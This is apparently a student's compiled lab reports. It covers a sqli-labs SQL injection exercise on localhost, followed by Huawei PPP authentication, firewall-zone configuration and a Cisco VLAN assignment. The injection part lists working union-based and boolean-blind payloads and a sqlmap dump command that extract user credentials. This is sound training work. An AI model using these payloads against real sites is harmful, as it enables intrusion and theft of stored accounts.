大四_17周实训
大四_17周实训
环境安装_windows
Windows 虚拟机 WIN10_LTSC
phpstudy 2016
安装比较老的php(不能大于7不然无法安装)
http://public.xp.cn/upgrades/phpStudy20161103.zip
能打开就行;
复制环境
https://github.com/Audi-1/sqli-labs
下一个zip
复制到这里:
粘贴到这里
改名为:sqli
填个密码:(默认密码是root)
访问:
等一会就行
这样就行:
环境安装_Linux
git clone https://github.com/Audi-1/sqli-labs
docker-compose up
#访问81端口即可docker-compose.yaml
version: '3'
services:
nginx:
image: nginx:latest
ports:
- "81:80"
volumes:
- ./sqli-labs:/var/www/html/sqli
- ./nginx.conf:/etc/nginx/conf.d/default.conf
depends_on:
- php
php:
build: .
volumes:
- ./sqli-labs:/var/www/html/sqli
mysql:
image: mysql:5.7
environment:
MYSQL_ROOT_PASSWORD: 123456
volumes:
- ./mysql_data:/var/lib/mysqlDockerfile
FROM php:5.6-fpm-alpine
RUN apk add --no-cache mysql-client
RUN docker-php-ext-install mysql mysqli pdo pdo_mysqlnginx.conf
server {
listen 80;
server_name localhost;
root /var/www/html;
index index.php index.html;
location ~ \.php$ {
fastcgi_pass php:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
}
}修改下配置文件
db-creds.inc
修改数据库连接配置
sql-connections/db-creds.inc
<?php
//give your mysql connection username n password
$dbuser ='root';
$dbpass ='toor';
$dbname ="security";
$host = 'mysql';
$dbname1 = "challenges";
?>
启动
端口转发即可
docker-compose up
如图所示
要求:任务1
http://127.0.0.1/sqli/Less-2/?id=1’
报错
http://127.0.0.1/sqli/Less-2/?id=1 and 1=1 正常
http://127.0.0.1/sqli/Less-2/?id=1 and 1=11不正常
确定为数值型,存在注入。
http://127.0.0.1/sqli/Less-2/?id=1 order by 10 不正常
http://127.0.0.1/sqli/Less-2/?id=1 order by 4 不正常
http://127.0.0.1/sqli/Less-2/?id=1 order by 3 正常
确定3列
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3
确定显示位2,3
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,database()
结果security ,确定了数据库名
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"
结果:emails,referers,uagents,users,确定了4个表名
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"
结果:id,username,password 一共3个列
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(username,0x7e,password) from users
爆出所有账号密码要求:任务2
SELECT * FROM users WHERE id='$id' LIMIT 0,1
id=1'--+
SELECT * FROM users WHERE id='1'
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(username,0x7e,password) from users--+
http://127.0.0.1/sqli/Less-3/?id=1')--+
http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2,group_concat(username,0x7e,password) from users--+
http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,group_concat(username,0x7e,password) from users--+
http://127.0.0.1/sqli/Less-5/?id=1' and length(database)=9--+错误
http://127.0.0.1/sqli/Less-5/?id=1' and length(database)=8--+正确
结论:数据库名字长度是8
http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))="s"--+正确
http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))="d"--+不正确
结论:数据库名字第一个字母是s
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))>114--+正确
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))>115--+错误
结论:ascii对应115,115对应s
101--e 99--c 117--u
爆表、列、值
进入网页,进行初始化
初始化;
实验任务1 - LESS2
1. 首先测试是否存在SQL注入漏洞:
http://127.0.0.1/sqli/Less-2/?id=1’ 报错
添加单引号后页面报错,说明存在潜在注入点。
2. 进一步通过and语句判断注入类型:
http://127.0.0.1/sqli/Less-2/?id=1 and 1=1 正常
继续尝试,提供错误表达式
http://127.0.0.1/sqli/Less-2/?id=1 and 1=11不正常3. 根据测试结果可以确定这是一个数值型注入。
确定为数值型,存在注入。
4. 尝试数据库获得字段数
http://127.0.0.1/sqli/Less-2/?id=1 order by 10 不正常
继续尝试
http://127.0.0.1/sqli/Less-2/?id=1 order by 4 不正常
继续尝试
http://127.0.0.1/sqli/Less-2/?id=1 order by 3 正常确定查询结果包含3个字段。
5. 确定显示位置
使用UNION SELECT语句确定显示位:
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3如图,确定显示位2,3
6. 确定数据库名
这样有显示了,就可以把数据库名字拿出来。
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,database()结果security ,确定了数据库名
7. 然后尝试把列名拿出来
id=-1 union select 1,2,group_concat(table_name)
from information_schema.tables
where table_schema="security"payload:
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" 结果:emails,referers,uagents,users。
8. 再拿字段名字
id=-1 union select 1,2,group_concat(column_name)
from information_schema.columns
where table_schema="security"
and table_name="users"payload:
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"
结果:id,username,password 一共3个列
9. 数据获取
最后获取用户表中的敏感信息:
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(username,0x7e,password) from users
爆出所有账号密码
实验任务2
SELECT * FROM users WHERE id='$id' LIMIT 0,1
id=1'--+
SELECT * FROM users WHERE id='1'
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(username,0x7e,password) from users--+
http://127.0.0.1/sqli/Less-3/?id=1')--+
http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2,group_concat(username,0x7e,password) from users--+
http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,group_concat(username,0x7e,password) from users--+
http://127.0.0.1/sqli/Less-5/?id=1' and length(database)=9--+错误
http://127.0.0.1/sqli/Less-5/?id=1' and length(database)=8--+正确
结论:数据库名字长度是8
http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))="s"--+正确
http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))="d"--+不正确
结论:数据库名字第一个字母是s
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))>114--+正确
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))>115--+错误
结论:ascii对应115,115对应s
101--e 99--c 117--u
爆表、列、值Less-1: 字符型注入(')
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(username,0x7e,password) from users--+需要闭合单引号,使用union select直接注入。
结果: 成功获取用户名和密码数据
Dumb~Dumb, Angelina~I-kill-you, Dummy~p@ssword, secure~crappy, stupid~stupidity, superman~genious, batman~mob!le, admin~admin, admin1~admin1, admin2~admin2, admin3~admin3, admin4~admin4
Less-3: 字符型注入(')
需要闭合单引号和括号
1. 测试注入点
http://127.0.0.1/sqli/Less-3/?id=1')--+
结果:页面正常显示,确认闭合方式正确
2.构造完整payload获取数据
http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2,group_concat(username,0x7e,password) from users--+
结果: 同Less-1,成功获取所有用户数据
Less-4: 字符型注入(")
需要闭合双引号和括号
http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,group_concat(username,0x7e,password) from users--+结果: 同样成功获取用户数据
Less-5: 布尔盲注
通过布尔盲注逐步获取信息
http://127.0.0.1/sqli/Less-5/?id=1' and length(database)=9--+错误
1.判断数据库名长度
http://127.0.0.1/sqli/Less-5/?id=1' and length(database())=9--+结果: 错误,页面无正常显示
http://127.0.0.1/sqli/Less-5/?id=1' and length(database)=8--+正确
结果: 正确,页面正常显示
结论: 数据库名长度为8个字符
2.逐字符判断数据库名
http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))="s"--+正确
结果: 正确,页面正常显示
http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))="d"--+不正确结果: 错误,页面无正常显示
结论: 数据库名第一个字符为's'
结论:数据库名字第一个字母是s
3.使用ASCII码进一步确认
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))>114--+正确结果: 正确
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))>115--+错误结果: 错误
结论: 第一个字符ASCII码为115,对应字母's'
4.常用ASCII码对照表
s: 115
e: 101
c: 99
u: 117
5.剩下的工作比较重复,直接使用工具即可
但是是没有灵魂的。
爆表、列、值,直接用工具啦。
爆库:
获得库:
爆表
6. 没有灵魂,直接DUMP出来
H:\awd\ONE-FOX集成工具箱_V6公开版_by狐狸\ONE-FOX集成工具箱_V6公开版_by狐狸\gui_scan\sqlmap> python sqlmap.py -u http://127.0.0.1/sqli/Less-5/?id=1 -D security --dump
OK,试验结束。
网络系统集成基础(实验学时)——实验八
https://h.dayi.ink/posts/2/#more
title: 网络系统集成基础(实验学时)——实验八
date: 2024-07-02 11:27:12
tags:
网络系统集成基础(实验学时)——实验八
实验八 校园网设计、广域网链接及认证
实验内容:
1、广域网链接PPP协议及认证(PAP认证、CHAP认证)。
2、防火墙区域配置
3、参考给定资料,设计山东科技大学校园网络(黄岛校区+泰安校区)。
实验报告:
要求独立完成,报告需包含模拟器配置文件
使用华为模拟器或思科模拟器完成
1、广域网链接PPP协议及认证(PAP认证、CHAP认证)。
添加模块:2SA
用串口线连接上:
先配置IP地址
R1:
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]int s4/0/0
[Huawei-Serial4/0/0]ip addr 20.1.1.1 24R2:
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]int s4/0/0
[Huawei-Serial4/0/0]ip addr 20.1.1.2 24
先开始抓包
在S4/0/0上开始抓包即可。
配置PAP:本地验证
服务端(R2):
aaa
local-user sdkd password cipher kd123456_ovo
local-user sdkd service-type ppp
int s4/0/0
ppp authentication-mode pap
客户端(R1):
int s4/0/0
ppp pap local-user sdkd password simple kd123456_ovo
int s4/0/0
shutdown
undo shutdown
抓包:
验证密码:
可见已经建立成功了:
配置CHAP
记得先开始抓包
抓包在s4/0/0上。
配置IP地址
同上文
[Huawei]undo info-center enable
Info: Information center is disabled.
[Huawei]int s4/0/0
[Huawei-Serial4/0/0]ip addr 20.1.1.1 24
[Huawei]int s4/0/0
[Huawei-Serial4/0/0]ip addr 20.1.1.1 24
CHAP:配置验证
服务端:R4
undo info-c enable
aaa
local-user sdkd password cipher 123456_ovo
local-user sdkd service-type ppp
int s4/0/0
link-protocol ppp
ppp authentication-mode chap
ip address 20.1.1.2 255.255.255.0
客户端:R3
undo info-c enable
int s4/0/0
link-protocol ppp
ppp chap user sdkd
ppp chap password cipher 123456_ovo
ip address 20.1.1.1 255.255.255.0
shut
undo shut
抓包握手
可以看到challenge和resp
challenge:
resp:
配置请求:
测试连接
ping 20.1.1.2
包含PPP层的ICMP包:
2、防火墙区域配置
致谢:胡芳同学
配置IP
网关都是.1
- 192.168.10.10/24
- 192.168.0.1/24
- 111.1.1.10/24
- 服务器:172.17.2.100/24
- 服务器:172.17.2.200/24
路由器配置IP
AR1
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo info en
Info: Information center is disabled.
[Huawei]int g0/0/2
[Huawei-GigabitEthernet0/0/2]ip addr 192.168.10.1 24
[Huawei-GigabitEthernet0/0/2]int g0/0/1
[Huawei-GigabitEthernet0/0/1]ip addr 192.168.0.1 24
[Huawei-GigabitEthernet0/0/1]int g0/0/0
[Huawei-GigabitEthernet0/0/0]ip addr 172.16.1.1 24AR2:
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo info en
Info: Information center is disabled.
[Huawei]int g0/0/0
[Huawei-GigabitEthernet0/0/0]ip addr 100.1.1.1 24
[Huawei-GigabitEthernet0/0/0]int g0/0/1
[Huawei-GigabitEthernet0/0/1]ip addr 111.1.1.1 24
[Huawei-GigabitEthernet0/0/1]ping 111.1.1.10
PING 111.1.1.10: 56 data bytes, press CTRL_C to break
Reply from 111.1.1.10: bytes=56 Sequence=1 ttl=128 time=110 ms
Reply from 111.1.1.10: bytes=56 Sequence=2 ttl=128 time=20 ms
防火墙配置:
sys
undo info en
#DMZ
int G0/0/0
ip address 172.16.2.1 24
#untrust
int G0/0/1
ip address 100.1.1.2 24
# trust
int G0/0/2
ip address 172.16.1.2 24步骤二:路由配置
# AR1配置
ip route-static 0.0.0.0 0.0.0.0 172.16.1.2
# AR2配置
ip route-static 0.0.0.0 0.0.0.0 100.1.1.2
# 防火墙配置
ip route-static 192.168.0.0 255.255.255.0 172.16.1.1
ip route-static 192.168.10.0 255.255.255.0 172.16.1.1
ip route-static 111.1.1.0 255.255.255.0 100.1.1.1AR1:
AR2:
AR3:
防火墙配置
# 1. 将接口加入相应的安全区域
firewall zone trust
add interface GigabitEthernet0/0/2
firewall zone untrust
add interface GigabitEthernet0/0/1
firewall zone dmz
add interface GigabitEthernet0/0/0
# 2. 配置安全区域间策略
policy interzone trust untrust outbound
policy 1
action permit
policy source 192.168.0.0 0.0.0.255
policy 2
action permit
policy source 192.168.10.0 0.0.0.255
policy interzone trust dmz outbound
policy 3
action permit
policy interzone dmz untrust outbound
policy 4
action permit
policy source 172.16.2.0 0.0.0.255
policy interzone dmz untrust inbound
policy 5
action permit
policy source 111.1.1.0 0.0.0.255
# 3. 小修:(可能不需要)
[SRG-policy-interzone-dmz-untrust-outbound-4]firewall zone dmz
10:34:30 2024/07/02
[SRG-zone-dmz]add interface GigabitEthernet0/0/0
10:34:36 2024/07/02
Info: The interface has been added to trust security zone.
[SRG-zone-dmz]firewall zone trust
10:34:46 2024/07/02
[SRG-zone-trust]undo add int g0/0/0
10:34:51 2024/07/02
[SRG-zone-trust]firewall zone dmz
10:35:02 2024/07/02
[SRG-zone-dmz]add interface GigabitEthernet0/0/0
验证:验证配置
[SRG-zone-dmz]dis policy all
10:35:57 2024/07/02
policy zone local
#
policy zone trust
#
policy zone untrust
#
policy zone dmz
#
policy interzone local trust inbound
firewall default packet-filter is permit
#
policy interzone local trust outbound
firewall default packet-filter is permit
#
policy interzone local untrust inbound
firewall default packet-filter is deny
#
policy interzone local untrust outbound
firewall default packet-filter is permit
#
policy interzone local dmz inbound
firewall default packet-filter is deny
#
policy interzone local dmz outbound
firewall default packet-filter is permit
#
policy interzone trust untrust inbound
firewall default packet-filter is deny
#
policy interzone trust untrust outbound
firewall default packet-filter is deny
policy 1 (0 times matched)
action permit
policy service service-set ip
policy source 192.168.0.0 0.0.0.255
policy destination any
policy 2 (0 times matched)
action permit
policy service service-set ip
policy source 192.168.10.0 0.0.0.255
policy destination any
#
policy interzone trust dmz inbound
firewall default packet-filter is deny
#
policy interzone trust dmz outbound
firewall default packet-filter is deny
policy 3 (0 times matched)
action permit
policy service service-set ip
policy source any
policy destination any
#
policy interzone dmz untrust inbound
firewall default packet-filter is deny
policy 5 (0 times matched)
action permit
policy service service-set ip
policy source 111.1.1.0 0.0.0.255
policy destination any
#
policy interzone dmz untrust outbound
firewall default packet-filter is deny
policy 4 (0 times matched)
action permit
policy service service-set ip
policy source 172.16.2.0 0.0.0.255
policy destination any
#
[SRG-zone-dmz] 测试:trust->untrust可以ping通
测试:trust->DMZ
ping 172.16.1.10可以ping通
测试:untrust->DMZ
ping 172.16.2.100可以ping通。
测试:DMZ->untrust
可以ping通
测试:untrust->trust
不可以ping通。
3、参考给定资料,设计山东科技大学校园网络(黄岛校区+泰安校区)。
以下内容已经包含在实验7中:
- 包含IPSEC隧道的设计(从公网转发私网流量)
- VLAN划分
- IP分配
配置文件
PAP
R1
[V200R003C00]
#
board add 0/4 2SA
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface Serial4/0/0
link-protocol ppp
ppp pap local-user sdkd password simple kd123456_ovo
ip address 20.1.1.1 255.255.255.0
#
interface Serial4/0/1
link-protocol ppp
#
interface GigabitEthernet0/0/0
#
interface GigabitEthernet0/0/1
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
returnR2
[V200R003C00]
#
board add 0/4 2SA
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user sdkd password cipher %$%$aRgKFvmdY5t[EEG6xQgR6Y]{%$%$
local-user sdkd service-type ppp
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface Serial4/0/0
link-protocol ppp
ppp authentication-mode pap
ip address 20.1.1.2 255.255.255.0
#
interface Serial4/0/1
link-protocol ppp
#
interface GigabitEthernet0/0/0
#
interface GigabitEthernet0/0/1
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
returnCHAP
R3
[V200R003C00]
#
board add 0/4 2SA
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface Serial4/0/0
link-protocol ppp
ppp chap user sdkd
ppp chap password cipher %$%$r|/!ZFhr=BZ4PC;fs\|A,.[a%$%$
ip address 20.1.1.1 255.255.255.0
#
interface Serial4/0/1
link-protocol ppp
#
interface GigabitEthernet0/0/0
#
interface GigabitEthernet0/0/1
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
returnR4
[V200R003C00]
#
board add 0/4 2SA
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user sdkd password cipher %$%$K0ne%.\pC$}kUuO2,bo=6i"K%$%$
local-user sdkd service-type ppp
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface Serial4/0/0
link-protocol ppp
ppp authentication-mode chap
ip address 20.1.1.2 255.255.255.0
#
interface Serial4/0/1
link-protocol ppp
#
interface GigabitEthernet0/0/0
#
interface GigabitEthernet0/0/1
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return防火墙
AR1
[V200R003C00]
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ip address 172.16.1.1 255.255.255.0
#
interface GigabitEthernet0/0/1
ip address 192.168.0.1 255.255.255.0
#
interface GigabitEthernet0/0/2
ip address 192.168.10.1 255.255.255.0
#
interface NULL0
#
ip route-static 0.0.0.0 0.0.0.0 172.16.1.2
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
returnAR2
[V200R003C00]
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ip address 100.1.1.1 255.255.255.0
#
interface GigabitEthernet0/0/1
ip address 111.1.1.1 255.255.255.0
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
ip route-static 0.0.0.0 0.0.0.0 100.1.1.2
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
returnFW1
# CLI_VERSION=V300R001
# Last configuration was changed at 2024/07/02 10:43:58 from console0
#*****BEGIN****public****#
#
stp region-configuration
region-name e05b8d1560bc
active region-configuration
#
interface GigabitEthernet0/0/0
alias GE0/MGMT
ip address 172.16.2.1 255.255.255.0
#
interface GigabitEthernet0/0/1
ip address 100.1.1.2 255.255.255.0
#
interface GigabitEthernet0/0/2
ip address 172.16.1.2 255.255.255.0
#
interface GigabitEthernet0/0/3
#
interface GigabitEthernet0/0/4
#
interface GigabitEthernet0/0/5
#
interface GigabitEthernet0/0/6
#
interface GigabitEthernet0/0/7
#
interface GigabitEthernet0/0/8
#
interface NULL0
alias NULL0
#
firewall zone local
set priority 100
#
firewall zone trust
set priority 85
add interface GigabitEthernet0/0/2
#
firewall zone untrust
set priority 5
add interface GigabitEthernet0/0/1
#
firewall zone dmz
set priority 50
add interface GigabitEthernet0/0/0
#
aaa
local-user admin password cipher %$%$)]`69::R3YFdi.SeqA[<66-$%$%$
local-user admin service-type web terminal telnet
local-user admin level 15
authentication-scheme default
#
authorization-scheme default
#
accounting-scheme default
#
domain default
#
#
nqa-jitter tag-version 1
#
ip route-static 111.1.1.0 255.255.255.0 100.1.1.1
ip route-static 192.168.0.0 255.255.255.0 172.16.1.1
ip route-static 192.168.10.0 255.255.255.0 172.16.1.1
#
banner enable
#
user-interface con 0
authentication-mode none
user-interface vty 0 4
authentication-mode none
protocol inbound all
#
slb
#
right-manager server-group
#
sysname SRG
#
l2tp domain suffix-separator @
#
firewall packet-filter default permit interzone local trust direction inbound
firewall packet-filter default permit interzone local trust direction outbound
firewall packet-filter default permit interzone local untrust direction outbound
firewall packet-filter default permit interzone local dmz direction outbound
#
ip df-unreachables enable
#
firewall ipv6 session link-state check
firewall ipv6 statistic system enable
#
dns resolve
#
firewall statistic system enable
#
pki ocsp response cache refresh interval 0
pki ocsp response cache number 0
#
undo dns proxy
#
license-server domain lic.huawei.com
#
web-manager enable
#
policy interzone trust untrust outbound
policy 1
action permit
policy source 192.168.0.0 0.0.0.255
policy 2
action permit
policy source 192.168.10.0 0.0.0.255
#
policy interzone trust dmz outbound
policy 3
action permit
#
policy interzone dmz untrust inbound
policy 5
action permit
policy source 111.1.1.0 0.0.0.255
#
policy interzone dmz untrust outbound
policy 4
action permit
policy source 172.16.2.0 0.0.0.255
#
return
#-----END----#0xff:文件下载
J:\ovo_8>tree /F
卷 新加卷 的文件夹 PATH 列表
卷序列号为 000000F0 5678:35C2
J:.
│ CHAP抓包.pcapng
│ PAP抓包.pcapng
│ 防火墙抓包1.pcapng
│ 防火墙抓包2.pcapng
│ 防火墙抓包3.pcapng
│
├─CHAP
│ │ r3.cfg
│ │ r4.cfg
│ │
│ └─chap
│ │ chap.topo
│ │
│ ├─904055DB-1C22-4e4c-AB05-6EBF512F02F
│ │ vrpcfg.zip
│ │
│ ├─90F0680A-37F0-4b02-B8DD-BB8267B411C
│ │ vrpcfg.zip
│ │
│ ├─97A89D3E-A69F-46ae-B21E-650ECB146AE
│ │ vrpcfg.zip
│ │
│ └─F7B890C7-DFF3-4e91-B891-5A93B8AAF64
│ vrpcfg.zip
│
├─PAP
│ │ R1.cfg
│ │ R2.cfg
│ │
│ └─PAP
│ │ PAP.topo
│ │
│ ├─97A89D3E-A69F-46ae-B21E-650ECB146AE
│ │ vrpcfg.zip
│ │
│ └─F7B890C7-DFF3-4e91-B891-5A93B8AAF64
│ vrpcfg.zip
│
└─防火墙
│ AR1.cfg
│ AR2.cfg
│ FW1.cfg
│
└─防火墙
│ 防火墙.topo
│
├─0220F2E4-47A2-486c-AD46-0D4769CE219
│ vrpcfg.zip
│
├─1AF76E92-D68A-4057-965D-3B6452594CE
│ PC.xml
│
├─6AE4406A-7116-4c99-972C-A2880B823B5
│ vrpcfg.zip
│
├─85DAA1A7-7D9C-4867-963B-C77C20308B0
│ flash.efz
│
├─86D4A863-1037-4f1b-9FFA-6F180DD7CFE
│ flash.efz
│
└─BABEBE9B-5DF1-4707-AE63-67BC804ACC0
PC.xml
J:\ovo_8>18 周实训作业
18 周实训作业
注:分支要求详细配置,简化配置,期末见 <h.dayi.ink> cmd因版本过于乱,临时不再维护
版本0.9
排版比较乱,建议直接下下来,直接看running-config
文件
https://p.dabbit.net/blog/pic_bed/sharex/_pn-2024-06-27-15-48-28_Marten_Infatuated_Delirious.rar
周四要求和作业
要求:内网
某公司企业内网,内网当中存在四个vlan ,分别为vlan10 vlan20 vlan30 vlan100
- 财务部是vlan10,并命名为caiwu
技术部是vlan20,并命名为jishu
管理部门为vlan30,并命名为guanli
内网服务器内网HTTP-SERVER单独位于vlan100,vlan名称为fuwuqi。 - 配置基本网络:
1)财务部的网段是192.168.1.0/24,网关为192.168.1.254
2)技术部的网段为192.168.2.0/24,网关为192.168.2.254
3)管理部的网段为192.168.3.0/24,网关为192.168.3.254
4)服务器的网段为172.16.1.0/24,网关为172.16.1.254
5)R1和SW1之间互联的地址为192.168.10.0/30的地址 - 现在要求所有的网关都在内网核心交换机SW1上,使用svi接口充当网关
- 实现内网所有PC和服务器之间的互联
- 由于内网员工对于计算机的使用能力较差,因此,针对财务部,技术部和管理部的终端而言,需要通过DHCP的方式自动获取IP地址(需要排除每个网段1-100的地址作为保留使用,从101开始获取),而服务器的地址由于需要固定访问,所以通过手动静态配置IP地址。(dhcp的server位于出口路由器R1上,使用dhcp的中继完成最终地址的获取)
- 允许内网管理部门的员工通过telnet管理内网的路由器和核心交换机,其他部门不允许通过telnet管理路由器和交换机。(要配置telnet管理内网设备)
要求:公网
公网部分
- R1和R2之间采用100.1.1.0/24网段,R2和R3之间采用124.126.100.0/24网段地址,R3和R4之间采用202.96.137.0/24网段地址,R3和外网HTTP-SERVER以及公网PC之间,采用124.126.200.0/24网段地址。(外网HTTP-SERVER和公网PC的网关为124.126.200.254)
- 为了保证公网之间能够通信,R1、R2、R3之间采用ospf动态路由协议进行通信
- 公网PC可以通过R1的8080端口访问到内网HTTP-SERVER的80端口的http业务
- 现在有一台公网服务器HTTP-SERVER,地址为124.126.200.10/24,现在需要内网用户能够访问到该公网服务器。(R1和R2之间使用124.126.100.0/24网段)
- 有一台公网的DNS-SERVER,地址为113.100.2.56/24,网关为113.100.2.1/24,我们最终想要通过访问www.shixun.com这个域名访问到公网http-server,并且查看首页的a small page,内容显示为:welcome to study our course!
要求:分支
- 内网PC7和PC8分别位于vlan70和vlan80这两个vlan当中
- PC7和PC8的网关分别为192.168.70.254 192.168.80.254,且网关位于R4路由器上
- PC7和PC8也要能够访问外网(测试访问公网HTTP-SERVER)
拓扑图
最后的拓扑图如下:
VLAN添加和配置
要求如下:VLAN配置要求
某公司企业内网中存在四个VLAN,具体配置如下:
| VLAN ID | 名称 | 部门/用途 |
|---|---|---|
| 10 | caiwu | 财务部 |
| 20 | jishu | 技术部 |
| 30 | guanli | 管理部门 |
| 100 | fuwuqi | 内网服务器(HTTP-SERVER) |
核心交换机:建立VLAN
Switch>en
Switch#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#host
Switch(config)#hostname
Switch(config)#hostname core
core(config)#vlan 10
core(config-vlan)#name caiwu
core(config-vlan)#vlan 20
core(config-vlan)#name jishu
core(config-vlan)#vlan 30
core(config-vlan)#name guanli
core(config-vlan)#vlan 100
core(config-vlan)#name fuwuqi
核心交换机:配置完的VLAN信息:
core#show vlan brief
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
Gig0/1, Gig0/2
10 caiwu active
20 jishu active
30 guanli active
100 fuwuqi active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active 核心交换机:配置VLAN分发,VTP服务器
在核心交换机上:
core(config)#vtp mode server
Device mode already VTP SERVER.
core(config)#vtp domain crazy-friday
Changing VTP domain name from NULL to crazy-friday
core(config)#vtp password crazy
Setting device VLAN database password to crazy核心交换机:配置VLAN地址
要求
2、配置基本网络:
1)财务部的网段是192.168.1.0/24,网关为192.168.1.254
2)技术部的网段为192.168.2.0/24,网关为192.168.2.254
3)管理部的网段为192.168.3.0/24,网关为192.168.3.254
